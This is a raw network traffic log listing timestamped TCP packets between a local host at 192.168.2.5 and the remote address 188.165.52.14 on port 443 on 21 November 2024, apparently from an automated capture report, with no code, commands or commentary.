                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.096395016 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.100239992 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.100255013 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.100317955 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.100327015 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.100364923 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.103492975 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.103507996 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.103565931 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.103574038 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.103615999 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.232757092 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.232783079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.233055115 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.233084917 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.233138084 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.236453056 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.236469984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.236536980 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.236557007 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.236598015 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.276796103 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.276812077 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.277031898 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.277060986 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.277111053 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.280972004 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.280986071 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.281047106 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.281055927 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.281084061 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.281101942 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.284869909 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.284884930 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.284955978 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.284964085 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.284995079 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.285011053 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.288126945 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.288141012 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.288208961 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.288218021 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.288264990 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.292047977 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.292066097 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.292119026 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.292131901 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.292152882 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.292176962 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.295279026 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.295293093 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.295360088 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.295368910 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.295416117 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.424732924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.424752951 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.424851894 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.424870014 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.424910069 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.428600073 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.428617001 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.428690910 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.428699017 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.428736925 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.468955994 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.468978882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.469057083 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.469074965 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.469222069 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.473180056 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.473220110 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.473283052 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.473290920 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.473330975 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.476378918 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.476392984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.476546049 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.476552963 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.476592064 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.480338097 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.480351925 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.480410099 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.480417013 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.480459929 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.483644962 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.483659983 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.483717918 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.483731031 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.483767986 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.486780882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.486793995 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.486855030 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.486862898 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.486898899 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.616858959 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.616878986 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.616993904 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.617029905 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.617191076 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.620918036 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.620934963 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.621011019 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.621021032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.621063948 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.661089897 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.661107063 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.661364079 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.661407948 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.661456108 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.664870024 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.664896965 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.664982080 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.664994001 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.665036917 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.668891907 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.668909073 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.669002056 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.669014931 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.669058084 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.672091961 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.672107935 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.672168016 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.672178984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.672202110 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.672223091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.675973892 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.675985098 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.676052094 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.676064968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.676110983 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.679117918 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.679132938 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.679188967 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.679198027 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.679233074 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.808780909 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.808799028 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.808851957 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.808872938 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.808891058 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.808917046 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.812647104 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.812666893 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.812714100 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.812727928 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.812815905 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.813180923 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.853072882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.853092909 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.853193998 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.853235960 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.853283882 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.857584000 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.857600927 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.857681036 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.857702017 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.857744932 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.860836029 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.860852957 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.861951113 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.861964941 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.862014055 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.863934994 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.863954067 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.864022017 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.864032984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.864078045 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.868232012 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.868247032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.868314028 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.868325949 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.868370056 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.871485949 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.871506929 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.871572018 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.871584892 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.871613026 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:27.871627092 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.000940084 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.000967026 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.001024961 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.001070976 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.001089096 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.001111984 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.004868984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.004885912 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.004945040 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.004964113 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.005007029 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.045849085 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.045872927 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.045947075 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.045983076 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.046022892 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.049397945 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.049412966 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.049474955 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.049487114 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.049521923 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.052628994 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.052644968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.052829981 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.052838087 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.052875996 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.056538105 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.056552887 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.056615114 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.056622982 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.056657076 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.060184002 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.060199022 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.060259104 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.060266018 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.060302019 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.063465118 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.063483000 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.063543081 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.063558102 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.063596964 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.199203968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.199232101 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.199296951 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.199343920 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.199368954 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.199385881 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.202533960 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.202549934 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.202615976 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.202646971 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.202696085 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.237838984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.237859964 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.237937927 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.237972975 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.238014936 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.241297960 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.241312981 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.241385937 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.241445065 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.241496086 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.241496086 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.244496107 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.244513035 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.244565964 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.244581938 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.244596958 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.244621038 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.248640060 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.248656988 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.248711109 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.248720884 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.248755932 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.248765945 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.252851009 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.252907991 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.252954006 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.252976894 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:28.252990961 CET49824443192.168.2.5188.165.52.14
